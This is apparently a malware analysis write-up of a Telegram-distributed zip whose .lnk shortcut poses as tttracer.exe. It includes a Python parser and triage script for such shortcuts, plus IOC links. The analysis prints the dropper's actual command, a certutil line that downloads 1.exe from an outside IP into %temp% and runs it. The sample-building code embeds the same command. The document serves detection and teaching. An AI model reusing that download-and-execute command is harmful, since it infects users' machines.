# Malware Real case

![image](https://hackmd.io/_uploads/SJtD5lcLbx.png)

I saw someone send a zip file in a Telegram channel.

![image](https://hackmd.io/_uploads/HkSt5xcUWl.png)

It looks like the real channel, but I noticed the channel has only 32 subscribers.

![image](https://hackmd.io/_uploads/rJh1jx9Lbx.png)

Moreover, the attacker has not made the Telegram channel URL match the original; they put something like Chinese characters in it instead.

![image](https://hackmd.io/_uploads/B13SjlcUZg.png)

I unzipped it.

![image](https://hackmd.io/_uploads/SyWVsg98Zx.png)

The .lnk pretends to be legitimate. From the file mals.lnk:

```bash!
LocalBasePath "C:\Windows\System32\tttracer.exe"
RunAsUser
window=showminnoactive
```

This is intentional deception. tttracer.exe is a real Microsoft binary (the Time Travel Tracing tool) that ships under System32, so a shortcut whose target is a signed Windows file looks trustworthy to the user and to anyone who only inspects the target path. The window is opened minimised and inactive, so the user does not notice anything when the shortcut runs.

It is dropper malware: it downloads the payload and hides it in %temp%.

![image](https://hackmd.io/_uploads/BknCigcLZx.png)

```bash!
cmd /C certutil.exe -urlcache -f http://202.95.11.173/1.exe %temp%/1.exe && start %temp%/1.exe
```

certutil with `-urlcache -f` is a well-known living-off-the-land download technique; here it fetches 1.exe from 202.95.11.173 into %temp% and `start` executes it immediately (Windows accepts the forward slash in `%temp%/1.exe`). A certutil process spawned from cmd.exe with a URL on its command line is a reliable thing to alert on.

![image](https://hackmd.io/_uploads/SyNH3lcUWx.png)

![image](https://hackmd.io/_uploads/ryccTxqIbx.png)

Suspicious activity

![image](https://hackmd.io/_uploads/HyWvRe58Ze.png)

Graph

![image](https://hackmd.io/_uploads/HJ2Y0gc8-x.png)

![image](https://hackmd.io/_uploads/BJwYJ-c8bl.png)

![image](https://hackmd.io/_uploads/BkpFlWc8Zl.png)

### IOC

![image](https://hackmd.io/_uploads/ryjXCxc8Wx.png)

## https://www.virustotal.com/gui/ip-address/202.95.11.173

## https://app.any.run/tasks/6125695d-8a5b-40e4-a1a3-e28503006768
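The deception in mals.lnk above (a trusted System32 target, the RunAsUser flag, a minimised window, and a certutil download-and-execute command) can be pulled out of a shortcut programmatically instead of by eyeballing a viewer. The following is an added example, not code from this write-up: a minimal parser for the MS-SHLLINK (.lnk) binary format plus a triage pass. It builds its own constructed sample shortcut modelled on mals.lnk (target path, show command and RunAsUser flag are taken from the page; placing the certutil command line in the shortcut's arguments field is this example's assumption about where it lived) and then parses and triages it. The `build_lnk`, `parse_lnk` and `triage` names are this example's own.

```python
"""Minimal .lnk (MS-SHLLINK) parser and triage for shortcut droppers.

Added example, not code from the original write-up. The sample shortcut is
constructed here to resemble mals.lnk; the certutil command line being in the
arguments field is an assumption of this example.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_FMT = "<I16sIIQQQIIIHHII"  # ShellLinkHeader, 76 bytes

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x1, 0x2
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x4, 0x8, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
RUN_AS_USER = 0x2000  # set when "Run as administrator" is ticked on the shortcut
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
LOLBIN_TOKENS = ("certutil", "-urlcache", "cmd /c", "powershell", "mshta",
                 "%temp%", "http://", "https://", "&& start")


def build_lnk(target, arguments, show_command, run_as_user):
    """Build a constructed .lnk with a LinkInfo LocalBasePath and UTF-16 arguments."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE | (RUN_AS_USER if run_as_user else 0)
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    base_path = target.encode("ascii") + b"\x00"
    lbp_off = 28 + len(volume_id)              # LinkInfo header is 28 bytes
    suffix_off = lbp_off + len(base_path)      # empty CommonPathSuffix follows the path
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 28, 0x1, 28, lbp_off, 0, suffix_off)
    link_info += volume_id + base_path + b"\x00"
    return header + link_info + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


def _cstr(data, off):
    return data[off:data.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data):
    """Return the shortcut fields that matter for triage."""
    hdr = struct.unpack_from(HEADER_FMT, data, 0)
    if hdr[0] != 0x4C or hdr[1] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, show_command = hdr[2], hdr[9]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:        # skip the PIDL, not needed for triage
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    local_base_path = None
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol, lbp_off, _cnrl, _suffix = struct.unpack_from("<IIIIIII", data, pos)
        if li_flags & 0x1:                      # VolumeIDAndLocalBasePath present
            local_base_path = _cstr(data, pos + lbp_off)
        pos += li_size
    strings = {}
    for bit, name in STRING_FIELDS:             # StringData blocks appear in this fixed order
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + width * count]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += width * count
    return {"local_base_path": local_base_path,
            "arguments": strings.get("arguments", ""),
            "show_command": SHOW_COMMANDS.get(show_command, hex(show_command)),
            "run_as_user": bool(flags & RUN_AS_USER)}


def triage(info):
    """List the deception indicators seen in the shortcut from the write-up."""
    findings = []
    args = info["arguments"].lower()
    hits = [t for t in LOLBIN_TOKENS if t in args]
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("window opens minimised and inactive, so the user sees nothing")
    if info["run_as_user"]:
        findings.append("RunAsUser flag set")
    target = (info["local_base_path"] or "").lower()
    if target.startswith("c:\\windows\\system32\\") and hits:
        findings.append("trusted System32 target %s launches: %s"
                        % (target.rsplit("\\", 1)[-1], ", ".join(hits)))
    findings += ["download URL (IOC): " + u
                 for u in re.findall(r"https?://[^\s\"']+", info["arguments"])]
    return findings


SAMPLE_LNK = build_lnk(  # constructed sample modelled on mals.lnk from the write-up
    "C:\\Windows\\System32\\tttracer.exe",
    "cmd /C certutil.exe -urlcache -f http://202.95.11.173/1.exe %temp%/1.exe && start %temp%/1.exe",
    7, True)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    for key, value in info.items():
        print("%-16s %s" % (key, value))
    for finding in triage(info):
        print("[!]", finding)
```

To use it on a real sample, pass `open("mals.lnk", "rb").read()` to `parse_lnk` instead of `SAMPLE_LNK`. The parser only reads the header, LinkInfo and StringData, which is enough to recover the target, arguments, show command and RunAsUser flag; it does not walk the ExtraData blocks, so a shortcut that only carries its target in an EnvironmentVariableDataBlock will report no LocalBasePath and should be inspected by hand.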